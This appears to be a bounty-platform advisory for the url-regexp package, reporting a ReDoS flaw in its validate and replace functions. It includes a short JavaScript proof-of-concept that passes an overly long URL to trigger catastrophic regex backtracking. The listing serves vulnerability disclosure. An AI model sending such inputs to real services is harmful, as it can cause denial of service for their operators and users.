url-regexp
summary
Regular Expression Denial of Service (ReDoS)
affected versions
*
severity
7.5

Overview

RegExp object to match and validate URL(s).

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker providing a long URL to validate or replace function will cause a Denial of Service attack.

PoC

var regex = require("url-regexp");
regex.validate(
  "http://huntr.dev.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312"
);

References

Cash
$25
XP
750

Popularity
5

6
75.04K